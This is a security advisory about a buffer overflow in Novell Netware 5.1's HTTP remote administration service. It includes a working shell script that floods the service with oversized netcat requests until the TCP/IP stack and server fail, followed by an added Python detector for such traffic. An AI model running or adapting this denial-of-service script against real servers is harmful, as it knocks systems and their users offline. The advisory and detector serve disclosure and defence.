COMMAND
Netware
SYSTEMS AFFECTED
Novell Netware 5.1 (server 5.00h, Dec 11, 1999)...
PROBLEM
Michal Zalewski found the following. Affected is virtually any
system running on top of Netware with http remote
administration (including web caching solutions, the BorderManager
firewall and so on), because there's a buffer overflow in the
remote administration protocol (http, usually on port 8008 or so)
for tcp-enabled Netware servers. It might be exploited
by sending a request like this:
GET / AAAAAAAAAAAAAAAAAAAAAAAAAAA.......(something between 4 and 8kb)
The connection won't be dropped (that's a Netware TCP/IP stack problem
or _feature_), but you'll get an error message on the console,
sometimes with a stack dump (yes, lovely: 41 41 41 41... ;). There
are two problems with it:
1. The overflow itself, of course, which allows an attacker to
   execute arbitrary code on the server.
2. A problem with the TCP/IP stack: there's no automatic clean-up
   when an application crashes. By connecting, sending the evil
   request, disconnecting and connecting again for some time
   (usually a few thousand times is enough), the whole TCP/IP stack
   will be fscked up, causing the death of TCP networking (first the
   server starts to refuse or immediately drop any connection,
   then it stops responding to network requests), and, eventually,
   the whole server dies.
Here is a simple script which, left running for some time, should kill
Netware TCP/IP. Please change $SERVER and $PORT for testing
purposes.
    #!/bin/sh
    SERVER=127.0.0.1
    PORT=8008
    WAIT=3
    DUZOA=`perl -e '{print "A"x4093}'`
    MAX=30
    while :; do
        ILE=0
        while [ $ILE -lt $MAX ]; do
            (
                (
                    echo "GET /"
                    echo $DUZOA
                    echo
                ) | nc $SERVER $PORT &
                sleep $WAIT
                kill -9 $!
            ) &>/dev/null &
            ILE=$[ILE+1]
        done
        sleep $WAIT
    done
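The request pattern described above (one header line of several kilobytes, repeated from the same source) can be flagged on a front-end filter or sensor placed before the administration port. The following is an added example, not part of the original advisory and not Novell code; the 1024-byte limit, the repeat threshold of 20 and the sample addresses are assumptions chosen for illustration.

```python
from collections import Counter

# Assumed limit: well under the 4 KB the advisory gives as the lower bound
# for the overflow, well over a normal administration-page request line.
MAX_LINE = 1024
# Assumed alert level for repeated oversized requests from one source.
REPEAT_ALERT = 20


def longest_header_line(raw: bytes) -> int:
    """Length of the longest line in the request head (before the blank line)."""
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    return max((len(line) for line in head.split(b"\n")), default=0)


def is_oversized(raw: bytes, limit: int = MAX_LINE) -> bool:
    """True when any line of the request head exceeds the limit."""
    return longest_header_line(raw) > limit


def scan(events, limit=MAX_LINE, repeat_alert=REPEAT_ALERT):
    """events: iterable of (source_ip, raw_request_bytes).

    Returns (counts, repeat_sources): per-source counts of oversized
    requests, and the sources that reached repeat_alert.
    """
    counts = Counter(src for src, raw in events if is_oversized(raw, limit))
    repeat = sorted(s for s, n in counts.items() if n >= repeat_alert)
    return counts, repeat


# Constructed sample traffic (documentation addresses, not real observations).
SAMPLE = (
    [("192.0.2.10", b"GET / HTTP/1.0\r\n\r\n")]                     # normal
    + [("198.51.100.7", b"GET /\n" + b"A" * 4093 + b"\n\n")] * 25   # script shape
    + [("203.0.113.5", b"GET / " + b"A" * 6000 + b"\r\n\r\n")]      # single line
)

if __name__ == "__main__":
    counts, repeat = scan(SAMPLE)
    for src, n in counts.items():
        print(src, n, "REPEAT" if src in repeat else "single")
```

The check looks at every line of the request head rather than only the first, because the script above puts the filler on the line after "GET /".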
SOLUTION
Nothing yet.